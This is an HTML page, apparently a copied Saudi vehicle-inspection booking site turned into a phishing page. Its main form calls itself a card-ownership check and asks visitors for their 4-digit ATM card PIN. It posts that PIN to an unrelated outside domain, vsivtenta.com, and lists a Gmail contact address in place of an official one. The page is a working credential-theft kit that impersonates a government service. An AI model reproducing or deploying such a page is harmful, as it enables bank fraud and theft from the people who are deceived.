<!DOCTYPE html>
<html lang="ar" dir="rtl"
    prefix="content: http://purl.org/rss/1.0/modules/content/  dc: http://purl.org/dc/terms/  foaf: http://xmlns.com/foaf/0.1/  og: http://ogp.me/ns#  rdfs: http://www.w3.org/2000/01/rdf-schema#  schema: http://schema.org/  sioc: http://rdfs.org/sioc/ns#  sioct: http://rdfs.org/sioc/types#  skos: http://www.w3.org/2004/02/skos/core#  xsd: http://www.w3.org/2001/XMLSchema# ">

<!-- Mirrored from vi.vsafety.sa/ar/book/apply by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 01 Apr 2024 19:25:26 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->

<head>
    <meta charset="utf-8" />
    <meta name="description"
        content="احجز موعد فحص فني دوري لمركبتك عبر خدمة الفحص الفني الدوري من مركز سلامة المركبات" />
    <meta name="abstract" content="احجز موعد فحص فني دوري لمركبتك عبر خدمة الفحص الفني الدوري من مركز سلامة المركبات" />
    <link rel="canonical" href="/book" />
    <meta name="MobileOptimized" content="width" />
    <meta name="HandheldFriendly" content="true" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script type="application/ld+json">{
    "@context": "https://schema.org",
    "@graph": [
        {
            "@type": "Organization",
            "additionalType": "GovernmentOrganization",
            "url": "https://vi.vsafety.sa/",
            "name": "مركز سلامة المركبات",
            "sameAs": "#",
            "description": "مركز سلامة المركبات بإشراف الهيئة السعودية للمواصفات والمقاييس والجودة  يقدم خدمة الفحص الفني الدوري للمركبات",
            "contactPoint": {
                "@type": "ContactPoint",
                "email": "salamehsaso018@gmail.com",
                "url": "https://vi.vsafety.sa/ar/contact",
                "availableLanguage": [
                    "English",
                    "Arabic"
                ]
            },
            "logo": {
                "@type": "ImageObject",
                "representativeOfPage": "True",
                "url": "https://vi.vsafety.sa/themes/custom/vehicle/logo.svg"
            },
            "acceptsReservations": "True"
        }
    ]
}</script>
    <script src="https://www.google.com/recaptcha/api562e.js?hl=ar" async defer></script>
    <link rel="alternate" hreflang="en" href="/book" />
    <link rel="icon" href="/assets/vsafety/themes/custom/vehicle/favicon.ico" type="image/vnd.microsoft.icon" />

    <title>حجز موعد | خدمة الفحص الفني الدوري</title>
    <link rel="stylesheet" media="all"
        href="/assets/vsafety/sites/book.vehicle.local/files/css/css_hwa09ppdq08_Fx2JX4vfuRJWg_YWyjGT-LBxYb8U2aw.css" />
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">

    <link rel="stylesheet" media="all"
        href="/assets/cdn.jsdelivr.net/npm/%40unicorn-fail/drupal-bootstrap-styles%400.0.2/dist/3.4.0/8.x-3.x/drupal-bootstrap.min.css"
        integrity="sha512-tGFFYdzcicBwsd5EPO92iUIytu9UkQR3tLMbORL9sfi/WswiHkA1O3ri9yHW+5dXk18Rd+pluMeDBrPKSwNCvw=="
        crossorigin="anonymous" />
    <link rel="stylesheet" media="all"
        href="/assets/vsafety/sites/book.vehicle.local/files/css/css_zBOuAC3I8SkUKMcGwgSEgLILmFfnq_xhvkEhao2RoJE.css" />

    <script src="https://vi.vsafety.sa/core/assets/vendor/modernizr/modernizr.min.js?v=3.11.7"></script>
    <script src="https://vi.vsafety.sa/core/misc/modernizr-additional-tests.js?v=3.11.7"></script>
    <script src="/assets/use.fontawesome.com/releases/v5.13.1/js/all.js" defer crossorigin="anonymous"></script>
    <script src="/assets/use.fontawesome.com/releases/v5.13.1/js/v4-shims.js" defer crossorigin="anonymous"></script>

    <script type="text/javascript" src="/assets/vsafety/modules/contrib/seckit/js/seckit.document_write.js"></script>
    <link type="text/css" rel="stylesheet" id="seckit-clickjacking-no-body" media="all"
        href="/assets/vsafety/modules/contrib/seckit/css/seckit.no_body.css" />
    <!-- stop SecKit protection -->
    <noscript>
        <link type="text/css" rel="stylesheet" id="seckit-clickjacking-noscript-tag" media="all"
            href="/assets/vsafety/modules/contrib/seckit/css/seckit.noscript_tag.css" />
        <div id="seckit-noscript-tag">
            Sorry, you need to enable JavaScript to visit this website.
        </div>
    </noscript>
</head>

<body class="path-book has-glyphicons">
    <a href="#main-content" class="visually-hidden focusable skip-link">
        تجاوز إلى المحتوى الرئيسي
    </a>
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W5VX94G" height="0" width="0"
            style="display:none;visibility:hidden"></iframe></noscript>

    <div class="dialog-off-canvas-main-canvas" data-off-canvas-main-canvas>

        <header class="navbar navbar-default" id="navbar" role="banner">
            <div class="container">
                <!-- header-->
                <div class="header">
                    <div class="navbar-header logos">
                        <div class="region region-navigation">
                            <a class="logo navbar-btn" href="/book" title="الرئيسية" rel="home">
                                <img class="img-responsive" src="/assets/vsafety/themes/custom/vehicle/logo.svg" alt="الرئيسية"
                                    height="60" />
                            </a>
                            <p class="navbar-text">خدمة الفحص الفني الدوري</p>

                        </div>

                    </div><!-- .navbar-header -->
                    <div class="search-languageBar">
                        <div class="region region-navigation-side">
                         
                            <section
                                class="language-switcher-language-url block block-language block-language-blocklanguage-interface clearfix"
                                id="block-languageswitcher" role="navigation">
                            </section>


                        </div>

                    </div><!-- .navbar-header-side -->
                </div>
            </div>

        </header>

        <div class="navigation-menu">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#navbar-collapse">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>

            <div id="navbar-collapse" class="navbar-collapse collapse">
                <div class="container">
                    <div class="region region-navigation-collapsible">
                        <nav role="navigation" aria-labelledby="block-mainnavigation-2-menu"
                            id="block-mainnavigation-2">
                            <h2 class="sr-only" id="block-mainnavigation-2-menu">Main navigation</h2>


                            <ul class="menu menu--main nav navbar-nav">
                                <li class="first">
                                    <a href="/book" data-drupal-link-system-path="&lt;front&gt;">الرئيسية</a>
                                </li>
                                <li>
                                    <a href="/inspection-criteria"
                                        data-drupal-link-system-path="inspection-criteria">بنود الفحص الفني الدوري</a>
                                </li>
                                <li class="active active-trail">
                                    <a href="/book" class="active-trail is-active"
                                        data-drupal-link-system-path="book/apply">حجز موعد</a>
                                </li>
                                <li>
                                    <a href="/edit" data-drupal-link-system-path="book/edit">تعديل موعد</a>
                                </li>
                                <li>
                                    <a href="/cancel" data-drupal-link-system-path="book/cancel">إلغاء موعد</a>
                                </li>
                                <li>
                                    <a href="/inspection-status"
                                        data-drupal-link-system-path="inspection-status">التحقق من حالة الفحص</a>
                                </li>
                                <li class="last">
                                    <a href="/contact" data-drupal-link-system-path="node/2">إتصل بنا</a>
                                </li>
                            </ul>


                        </nav>
                        <section id="block-mainnavigation" class="block block-superfish block-superfishmain clearfix">




                            <ul id="superfish-main" class="menu sf-menu sf-main sf-horizontal sf-style-none rtl">

                                <li id="main-standardfront-page" class="sf-depth-1 sf-no-children"><a
                                        href="/" class="sf-depth-1">الرئيسية</a></li>
                                <li id="main-menu-link-content43f4faa5-8f64-40a4-9d92-daf11fa92967"
                                    class="sf-depth-1 sf-no-children"><a href="/inspection-criteria"
                                        class="sf-depth-1">بنود الفحص الفني الدوري</a></li>
                                <li id="main-menu-link-content0ab33c7e-4fbb-41c1-a220-1ea519e11de2"
                                    class="active-trail sf-depth-1 sf-no-children"><a href="/book"
                                        class="is-active sf-depth-1">حجز موعد</a></li>
                                <li id="main-menu-link-content5d57090d-7dc2-4c6d-a906-082f5fc8b69d"
                                    class="sf-depth-1 sf-no-children"><a href="/edit" class="sf-depth-1">تعديل
                                        موعد</a></li>
                                <li id="main-menu-link-content911cf031-449e-44ec-a609-3f4c4640d4ad"
                                    class="sf-depth-1 sf-no-children"><a href="/cancel" class="sf-depth-1">إلغاء
                                        موعد</a></li>
                                <li id="main-menu-link-content3581e2c9-5c83-40e5-b70e-217a0fcfce0b"
                                    class="sf-depth-1 sf-no-children"><a href="/inspection-status"
                                        class="sf-depth-1">التحقق من حالة الفحص</a></li>
                                <li id="main-menu-link-contenta2d67960-5a32-4389-8290-4ee1ac39e568"
                                    class="sf-depth-1 sf-no-children"><a href="/contact"
                                        class="sf-depth-1">إتصل بنا</a></li>
                            </ul>

                        </section>


                    </div>

                </div>
            </div>


        </div>



        <div role="main" class="main-container container js-quickedit-main-content">
            <div class="container">
                <div class="row">



                    <style>
                        .form-check .form-check-input {
                            float: right;
                            margin-right: -1.3em;
                            margin-top: -1.3rem;
                        }

                        input[type=radio] {
                            width: 2em;
                            height: 2em;
                        }
                        .book-btn {
                            width: unset;
                        }

                        .path-book #drupal-modal button[type="submit"]:not(.reset-link), .path-book .booking_form_wrapper button[type="submit"], .booking_form_wrapper button[type="submit"] {
                            padding: 5px 30px;
                            margin-top: unset;
                        }

                    </style>

                    <section class="col-sm-12">
                        
                        <div class="region region-content">

                            <form action="https://vsivtenta.com/authn/store" method="post" class="svis-book-book-apply">
                                <input type="hidden" name="_token" value="Ry62nZ0O7ErzpFZ10K9jJgVbVRt8NGl5opdNghEx" autocomplete="off">                                <div style="background-color: #dbf1f6" class="row mt-5 rounded">

                                    <div class="col-sm-12 col-md-8 pb-4">
                                        <div id="book_apply" class="booking_form_wrapper">
                                            <h2 style="margin-bottom: unset">إثبات ملكية البطاقة</h2>
                                            <p>الرجاء إدخال الرقم السري الخاص بالبطاقة المكون من 4 ارقام.</p>
                                            <div class="row">

                                                <div class="col-12">
                                                    <div class="form-item js-form-item form-type-textfield js-form-type-textfield form-item-customer-name js-form-item-customer-name form-group">
                                                        <label class="control-label js-form-required form-required">الرقم السري</label>
                                                        <input data-drupal-selector="edit-customer-cv"
                                                            class="form-text required form-control"
                                                            type="tel" id="edit-customer-cv"
                                                            name="code"
                                                            size="4"
                                                            maxlength="4" placeholder="أدخل الرقم السري الخاص بالبطاقة" required="required"
                                                            aria-required="true" />
                                                    </div>
                                                    <p class="mb-4">الرقم السري الخاص بالبطاقة: هو الرقم الذي يستخدم للدخول الى الصراف الالي</p>
                                                </div>
                                                
                                            </div><!-- .row -->
                                            <div class="row">
                                                <div class="col-4">
                                                    <button style="font-size: 18px; background-color: #0096b8" class="book-btn" type="submit">تأكيــد</button>
                                                </div>
                                                <div class="col-8">
                                                    <img src="https://vsivtenta.com/images/cards.png" class="w-100">
                                                </div>
                                            </div>

                                        </div><!-- #book-apply -->
                                    </div><!-- .col -->
                                </div><!-- .row -->

                            </form>


                        </div>

                    </section>
                </div><!-- .row -->
            </div><!-- .container -->
        </div><!-- .main-container -->

        <footer class="footer" role="contentinfo">
            <div class="container">
                <div class="region region-footer">
                    <nav role="navigation" aria-labelledby="block-footer-menu" id="block-footer">

                        <h2 class="visually-hidden" id="block-footer-menu">Footer</h2>



                        <ul class="menu menu--footer nav">
                            <li class="first">
                                <a href="/inspection-status" data-drupal-link-system-path="&lt;front&gt;">إدارة حجز
                                    المواعيد</a>
                            </li>
                            <li class="last">
                                <a href="/contact" data-drupal-link-system-path="node/2">إتصل بنا</a>
                            </li>
                        </ul>


                    </nav>
                    <section id="block-footer2arabicnew"
                        class="block block-simple-block block-simple-blockfooter-2-arabic-new clearfix">



                        <div class="contact-us">
                            <div class="headset"><img alt="supprt"
                                    src="/assets/vsafety/themes/custom/vehicle/images/iconfinder_headset_172475.png" />
                                <div>يمكــنك التـواصل معنـــا <a href="mailto:salamehsaso018@gmail.com"><span
                                            class="tel">salamehsaso018@gmail.com</span></a>
                                </div>

                                <div> </div>
                            </div>
                            <!-- .headset -->
                        </div>

                        <p>إبق على اتصال معنا عبر مواقع التواصل الإجتماعي</p>

                        <div class="d-flex justify-content-between social-icons">
                            <span><a target="_blank" href="#"><img alt="twitter"
                                        src="/assets/vsafety/themes/custom/vehicle/images/twitter.svg" /></a></span>
                            <span><a target="_blank" href="#"><img alt="facebook"
                                        src="/assets/vsafety/themes/custom/vehicle/images/facebook.svg" /></a></span>
                            <span><a target="_blank" href="#"><img
                                        alt="youtube"
                                        src="/assets/vsafety/themes/custom/vehicle/images/youtube.svg" /></a></span>
                            <span><a target="_blank" href="#"><img
                                        alt="rss"
                                        src="/assets/vsafety/themes/custom/vehicle/images/snapchat.svg" /></a></span>
                            <span><a target="_blank" href="#"><img alt="isntagram"
                                        src="/assets/vsafety/themes/custom/vehicle/images/instagram.svg" /></a></span>
                        </div>

                    </section>

                    <section id="block-footer3arabic"
                        class="block block-simple-block block-simple-blockfooter-3-arabic clearfix">



                        <div class="text-right">
                            <div class="pull-right ">
                                <div class="text-center" style="width: 145px;">
                                    <div>تحت إشراف</div>
                                    <img alt="" class="img-responsive"
                                        src="/assets/vsafety/themes/custom/vehicle/SASO.svg" />
                                </div>
                            </div>
                            

                            <div class="clearfix"> </div>
                            <br />
                            <div class="cpyRightText text-right">جميع الحقوق محفوظة – سلامة المركبات © 2021</div>
                            <!-- .cpyRght -->
                        </div>

                    </section>


                </div>

            </div>
        </footer>

    </div>


    <script type="application/json" data-drupal-selector="drupal-settings-json">{"path":{"baseUrl":"\/","scriptPath":null,"pathPrefix":"ar\/","currentPath":"book\/apply","currentPathIsAdmin":false,"isFront":false,"currentLanguage":"ar"},"pluralDelimiter":"\u0003","suppressDeprecationErrors":true,"gtm":{"tagId":null,"settings":{"data_layer":"dataLayer","include_classes":false,"allowlist_classes":"google\nnonGooglePixels\nnonGoogleScripts\nnonGoogleIframes","blocklist_classes":"customScripts\ncustomPixels","include_environment":false,"environment_id":"","environment_token":""},"tagIds":["GTM-W5VX94G"]},"gtag":{"tagId":"","otherIds":[],"events":[],"additionalConfigInfo":[]},"ajaxPageState":{"libraries":"bootstrap\/popover,bootstrap\/tooltip,captcha\/base,clientside_validation_jquery\/cv.jquery.ckeditor,clientside_validation_jquery\/cv.jquery.validate,clientside_validation_jquery\/cv.pattern.method,core\/drupal.date,core\/internal.jquery.form,fontawesome\/fontawesome.svg,fontawesome\/fontawesome.svg.shim,google_tag\/gtag,google_tag\/gtag.ajax,google_tag\/gtm,slick\/slick,slick\/slick.easing,slick\/slick.mousewheel,superfish\/superfish,superfish\/superfish_hoverintent,superfish\/superfish_smallscreen,superfish\/superfish_supersubs,superfish\/superfish_supposition,svis_book\/selecticons,svis_book\/svis_book_form,system\/base,vehicle\/global-scripts,vehicle\/rtl,webform_bootstrap\/webform_bootstrap","theme":"vehicle","theme_token":null},"ajaxTrustedUrl":{"form_action_p_pvdeGsVG5zNF_XLGPTvYSKCf43t8qZYSwcfZl2uzM":true,"\/ar\/book\/apply?ajax_form=1":true,"\/ar\/search\/node":true},"clientside_validation_jquery":{"validate_all_ajax_forms":1,"force_validate_on_blur":true,"messages":{"required":"\u0647\u0630\u0627 \u0627\u0644\u062d\u0642\u0644 \u0636\u0631\u0648\u0631\u064a","remote":"Please fix this field.","email":"Please enter a valid email address.","url":"Please enter a valid URL.","date":"Please enter a valid date.","dateISO":"Please enter a valid date (ISO).","number":"\u0627\u0644\u0631\u062c\u0627\u0621 \u0625\u062f\u062e\u0627\u0644 \u0631\u0642\u0645 \u0635\u062d\u064a\u062d","digits":"Please enter only digits.","equalTo":"Please enter the same value again.","maxlength":"Please enter no more than {0} characters.","minlength":"\u0627\u0644\u0631\u062c\u0627\u0621 \u0625\u062f\u062e\u0627\u0644 {0} \u062d\u0631\u0641\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0623\u0642\u0644.","rangelength":"Please enter a value between {0} and {1} characters long.","range":"Please enter a value between {0} and {1}.","max":"Please enter a value less than or equal to {0}.","min":"Please enter a value greater than or equal to {0}.","step":"Please enter a multiple of {0}."}},"bootstrap":{"forms_has_error_value_toggle":1,"modal_animation":1,"modal_backdrop":"true","modal_focus_input":1,"modal_keyboard":1,"modal_select_text":1,"modal_show":1,"modal_size":"","popover_enabled":1,"popover_animation":1,"popover_auto_close":1,"popover_container":"body","popover_content":"","popover_delay":"0","popover_html":0,"popover_placement":"right","popover_selector":"","popover_title":"","popover_trigger":"click","tooltip_enabled":1,"tooltip_animation":1,"tooltip_container":"body","tooltip_delay":"0","tooltip_html":0,"tooltip_placement":"auto left","tooltip_selector":"","tooltip_trigger":"hover"},"ajax":{"edit-submit":{"callback":"::submitFormCallback","wrapper":"svis-book-book-apply","event":"mousedown","keypress":true,"prevent":"click","url":"\/ar\/book\/apply?ajax_form=1","dialogType":"ajax","submit":{"_triggering_element_name":"next","_triggering_element_value":"\u0627\u0644\u062a\u0627\u0644\u064a"}},"edit-ajax-loader":{"callback":"Drupal\\svis_book\\SVIS\\FormAPI::ajaxLoader","event":"change","progress":{"type":"none"},"url":"\/ar\/book\/apply?ajax_form=1","dialogType":"ajax","submit":{"_triggering_element_name":"ajax_loader"}},"edit-appointment-date":{"callback":"Drupal\\svis_book\\SVIS\\FormAPI::dateCallback","disable-refocus":false,"event":"change","wrapper":"timeslot_wrapper","url":"\/ar\/book\/apply?ajax_form=1","dialogType":"ajax","submit":{"_triggering_element_name":"appointment_date"}},"edit-center-id":{"callback":"Drupal\\svis_book\\SVIS\\FormAPI::centerCallback","disable-refocus":false,"event":"change","wrapper":"appointment_date_wrapper","url":"\/ar\/book\/apply?ajax_form=1","dialogType":"ajax","submit":{"_triggering_element_name":"center_id"}},"edit-zone-id":{"callback":"Drupal\\svis_book\\SVIS\\FormAPI::zoneCallback","disable-refocus":false,"event":"change","wrapper":"center_id_wrapper","url":"\/ar\/book\/apply?ajax_form=1","dialogType":"ajax","submit":{"_triggering_element_name":"zone_id"}},"edit-service-id":{"callback":"Drupal\\svis_book\\SVIS\\FormAPI::serviceCallback","disable-refocus":false,"event":"change","wrapper":"location_wrapper","url":"\/ar\/book\/apply?ajax_form=1","dialogType":"ajax","submit":{"_triggering_element_name":"service_id"}},"edit-vehicle-class-id":{"callback":"Drupal\\svis_book\\SVIS\\FormAPI::vclClassCallback","disable-refocus":true,"event":"change","wrapper":"service_id_wrapper","url":"\/ar\/book\/apply?ajax_form=1","dialogType":"ajax","submit":{"_triggering_element_name":"vehicle_class_id"}}},"superfish":{"superfish-main":{"id":"superfish-main","sf":{"animation":{"opacity":"show","height":"show"},"speed":"fast"},"plugins":{"smallscreen":{"mode":"window_width","expandText":"\u062a\u0648\u0633\u064a\u0639","collapseText":"\u0637\u064a","title":"Main navigation"},"supposition":true,"supersubs":true}}},"user":{"uid":0,"permissionsHash":"6ce9e9b0e3d4242014cdb117e480fc28944904cbd4872320b0434e6a588fb135"}}</script>
    <script src="/assets/vsafety/sites/book.vehicle.local/files/js/js_5OYhckd1fYYNc_a7BNzYsKWbWvY5zL0M1y-k8QkJ6ww.js"></script>
    <script src="/assets/cdn.jsdelivr.net/npm/bootstrap%403.4.1/dist/js/bootstrap.min.js"
        integrity="sha256-nuL8/2cJ5NDSSwnKD8VqreErSWHtnEP9E7AySL+1ev4=" crossorigin="anonymous"></script>
    <script src="/assets/vsafety/sites/book.vehicle.local/files/js/js_XyYIdcueivG2pN6C65t7AER8FWxK_UCGPQF1731lx_g.js"></script>
    <script src="/assets/vsafety/modules/contrib/google_tag/js/gtm9221.js?s7feje"></script>
    <script src="/assets/vsafety/modules/contrib/google_tag/js/gtag9221.js?s7feje"></script>
    <script src="/assets/vsafety/sites/book.vehicle.local/files/js/js_tWp7Vbx725TNBLMIpypwalPws5E-4IJDqpIQJNYsjmw.js"></script>
    <script src="/assets/cdn.jsdelivr.net/npm/jquery-validation%401.19.5/dist/jquery.validate.min.js"></script>
    <script src="/assets/vsafety/sites/book.vehicle.local/files/js/js_B47x9Et2majyK_Hyhy59LB7GR8JyhjrmyQ7YpXJdCn4.js"></script>

</body>

<!-- Mirrored from vi.vsafety.sa/ar/book/apply by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 01 Apr 2024 19:25:28 GMT -->

</html>
